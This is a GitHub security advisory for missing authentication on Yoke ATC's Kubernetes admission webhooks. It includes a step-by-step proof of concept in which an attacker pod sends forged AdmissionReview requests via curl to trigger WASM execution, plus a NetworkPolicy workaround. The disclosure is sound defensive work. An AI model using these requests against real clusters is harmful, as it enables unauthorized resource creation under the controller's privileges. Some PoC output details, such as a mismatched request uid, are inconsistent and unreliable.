Skip to content

Unauthenticated Admission Webhook Endpoints in Yoke ATC

High severity GitHub Reviewed Published Feb 12, 2026 in yokecd/yoke • Updated Feb 13, 2026

Package

gomod github.com/yokecd/yoke (Go)

Affected versions

<= 0.19.0

Patched versions

None

Description

Unauthenticated Admission Webhook Endpoints in Yoke ATC

This vulnerability exists in the Air Traffic Controller (ATC) component of Yoke, a Kubernetes deployment tool. The ATC webhook endpoints lack proper authentication mechanisms, allowing any pod within the cluster network to directly send AdmissionReview requests to the webhook, bypassing Kubernetes API Server authentication. This enables attackers to trigger WASM module execution in the ATC controller context without proper authorization.

Recommended CWE: CWE-306 (Missing Authentication for Critical Function)

Summary

Yoke ATC implements multiple Admission Webhook endpoints (/validations/{airway}, /validations/resources, /validations/flights.yoke.cd, /validations/airways.yoke.cd, etc.) that process AdmissionReview requests. These endpoints do not implement TLS client certificate authentication or request source validation. Any client that can reach the ATC service within the cluster can send requests directly to these endpoints, bypassing the Kubernetes API Server's authentication and authorization mechanisms.

Details

The vulnerability exists in the HTTP handler implementation where webhook endpoints accept and process requests without verifying the client identity.

Vulnerable Endpoint Handlers (cmd/atc/handler.go:147-335):

mux.HandleFunc("POST /validations/{airway}", func(w http.ResponseWriter, r *http.Request) {
    var review admissionv1.AdmissionReview
    if err := json.NewDecoder(r.Body).Decode(&review); err != nil {
        http.Error(w, fmt.Sprintf("failed to decode review: %v", err), http.StatusBadRequest)
        return
    }
    // No authentication check - request is processed directly
    // ...
})

Additional Unauthenticated Endpoints:

  • /validations/resources (cmd/atc/handler.go:337-538)
  • /validations/external-resources (cmd/atc/handler.go:540-597)
  • /validations/airways.yoke.cd (cmd/atc/handler.go:599-636)
  • /validations/flights.yoke.cd (cmd/atc/handler.go:638-733)
  • /crdconvert/{airway} (cmd/atc/handler.go:61-145)

The code lacks:

  1. TLS client certificate verification
  2. Request source validation (verifying requests come from kube-apiserver)
  3. Any form of authentication middleware

PoC

Environment Setup

Prerequisites:

  • Docker installed and running
  • kubectl installed
  • Go 1.21+ installed
  • kind installed

Step 1: Create Kind cluster

cat > /tmp/kind-config.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
name: yoke-vuln-test
nodes:
- role: control-plane
EOF

kind create cluster --config /tmp/kind-config.yaml

Step 2: Build and install Yoke CLI

git clone https://github.com/yokecd/yoke.git
cd yoke
GOPROXY=direct GOSUMDB=off go build -o /tmp/yoke ./cmd/yoke

Step 3: Deploy ATC

/tmp/yoke takeoff --create-namespace --namespace atc -wait 120s atc oci://ghcr.io/yokecd/atc-installer:latest

Step 4: Deploy Backend Airway example

/tmp/yoke takeoff -wait 60s backendairway "https://github.com/yokecd/examples/releases/download/latest/atc_backend_airway.wasm.gz"

Exploitation Steps

Step 1: Create attacker pod

kubectl apply -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: webhook-attacker
  namespace: default
spec:
  containers:
  - name: attacker
    image: curlimages/curl:latest
    command: ["sleep", "infinity"]
EOF

kubectl wait --for=condition=Ready pod/webhook-attacker --timeout=60s

Step 2: Probe webhook endpoints from attacker pod

kubectl exec webhook-attacker -- curl -k -s -w "\nHTTP_CODE: %{http_code}" \
  -X POST https://atc-atc.atc.svc.cluster.local:80/validations/resources \
  -H "Content-Type: application/json" -d '{}'

Actual output from verification:

panic

HTTP_CODE: 500

The HTTP 500 response (not 401/403) indicates the endpoint is accessible without authentication. The error is due to invalid request body format, not authentication failure.

Step 3: Send crafted AdmissionReview request

Create malicious request file:

cat > /tmp/malicious-review.json << 'EOF'
{
  "apiVersion": "admission.k8s.io/v1",
  "kind": "AdmissionReview",
  "request": {
    "uid": "vul002-exploit-uid",
    "kind": {"group": "examples.com", "version": "v1", "kind": "Backend"},
    "resource": {"group": "examples.com", "version": "v1", "resource": "backends"},
    "name": "exploit-backend",
    "namespace": "default",
    "operation": "CREATE",
    "userInfo": {"username": "attacker-from-pod", "groups": ["system:unauthenticated"]},
    "object": {
      "apiVersion": "examples.com/v1",
      "kind": "Backend",
      "metadata": {"name": "exploit-backend", "namespace": "default"},
      "spec": {"image": "nginx:latest", "replicas": 1}
    }
  }
}
EOF

kubectl cp /tmp/malicious-review.json webhook-attacker:/tmp/malicious-review.json

Send the request:

kubectl exec webhook-attacker -- curl -k -s -X POST \
  https://atc-atc.atc.svc.cluster.local:80/validations/backends.examples.com \
  -H "Content-Type: application/json" \
  -d @/tmp/malicious-review.json

Actual output from verification:

{"kind":"AdmissionReview","apiVersion":"admission.k8s.io/v1","request":{"uid":"vul002-normal-test","kind":{"group":"examples.com","version":"v1","kind":"Backend"},"resource":{"group":"examples.com","version":"v1","resource":"backends"},"name":"vul002-normal-backend","namespace":"default","operation":"CREATE","userInfo":{"username":"attacker-from-pod","groups":["system:unauthenticated"]},"object":{"apiVersion":"examples.com/v1","kind":"Backend","metadata":{"name":"vul002-normal-backend","namespace":"default"},"spec":{"image":"nginx:latest","replicas":1}},"oldObject":null,"options":null},"response":{"uid":"vul002-normal-test","allowed":false,"status":{"metadata":{},"status":"Failure","message":"applying resource returned errors during dry-run..."}}}

Step 4: Verify ATC logs

kubectl logs -n atc deployment/atc-atc --tail=20 | grep backends.examples.com

Actual log output:

{"time":"2026-02-01T15:29:08.890991543Z","level":"INFO","msg":"request served","component":"server","code":200,"method":"POST","path":"/validations/backends.examples.com","elapsed":"435ms","validation":{"allowed":false,"status":"Invalid"}}

The elapsed: 435ms indicates WASM module execution occurred.

Expected Result

The attacker pod successfully sends AdmissionReview requests directly to the ATC webhook endpoint without any authentication. The ATC controller processes the request and executes the WASM module, proving that:

  1. No TLS client certificate is required
  2. No request source validation occurs
  3. The fake userInfo is accepted without verification
  4. WASM modules are executed based on unauthenticated requests

Impact

Vulnerability Type: Missing Authentication / Authentication Bypass

Attack Prerequisites:

  • Attacker has access to a pod within the cluster network
  • Network policies do not restrict access to the ATC service (common in default configurations)

Impact Assessment:

  • Confidentiality: Medium - Attacker can trigger WASM execution which may access controller context data
  • Integrity: High - Combined with VUL-001, attacker can create arbitrary Kubernetes resources
  • Availability: Medium - Attacker can cause resource exhaustion through repeated requests

Attack Scenario:

  1. Attacker compromises a pod or gains access to the cluster network
  2. Attacker sends crafted AdmissionReview requests directly to ATC webhook
  3. ATC processes requests without verifying they came from the API Server
  4. Combined with annotation injection (VUL-001), attacker can execute arbitrary WASM code
  5. Malicious WASM can create resources or exfiltrate data using ATC's cluster-admin privileges

Severity

CVSS v3.1 Score: 7.5 (High)

Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

  • Attack Vector (AV): Network - Accessible from cluster network
  • Attack Complexity (AC): Low - Simple HTTP request
  • Privileges Required (PR): None - No authentication required
  • User Interaction (UI): None - Automatic processing
  • Scope (S): Unchanged
  • Confidentiality (C): None - Direct impact limited
  • Integrity (I): High - Can trigger unauthorized WASM execution
  • Availability (A): None - No direct availability impact

Note: When combined with VUL-001, the overall impact increases significantly.

Affected Versions

  • Yoke ATC v0.18.x and earlier versions
  • All versions that implement Admission Webhook endpoints without client authentication

Patched Versions

No patch available at time of disclosure.

Workarounds

  1. Network Policy: Deploy NetworkPolicy to restrict access to ATC service, allowing only kube-apiserver to connect
apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: atc-webhook-policy
  namespace: atc
spec:
  podSelector:
    matchLabels:
      yoke.cd/app: atc
  policyTypes:
  - Ingress
  ingress:
  - from:
    - namespaceSelector:
        matchLabels:
          kubernetes.io/metadata.name: kube-system
      podSelector:
        matchLabels:
          component: kube-apiserver
  1. Service Mesh: Use a service mesh (Istio, Linkerd) to enforce mTLS between services

  2. Pod Security: Implement strict pod security policies to limit which pods can be created in the cluster

References

Credits

credit for:
@b0b0haha (603571786@qq.com)
@lixingquzhi (mayedoushidalao@163.com)

References

@davidmdm davidmdm published to yokecd/yoke Feb 12, 2026
Published to the GitHub Advisory Database Feb 12, 2026
Reviewed Feb 12, 2026
Published by the National Vulnerability Database Feb 12, 2026
Last updated Feb 13, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

EPSS score

Exploit Prediction Scoring System (EPSS)

This score estimates the probability of this vulnerability being exploited within the next 30 days. Data provided by FIRST.
(33rd percentile)

Weaknesses

Missing Authentication for Critical Function

The product does not perform any authentication for functionality that requires a provable user identity or consumes a significant amount of resources. Learn more on MITRE.

CVE ID

CVE-2026-26055

GHSA ID

GHSA-965m-v4cc-6334

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.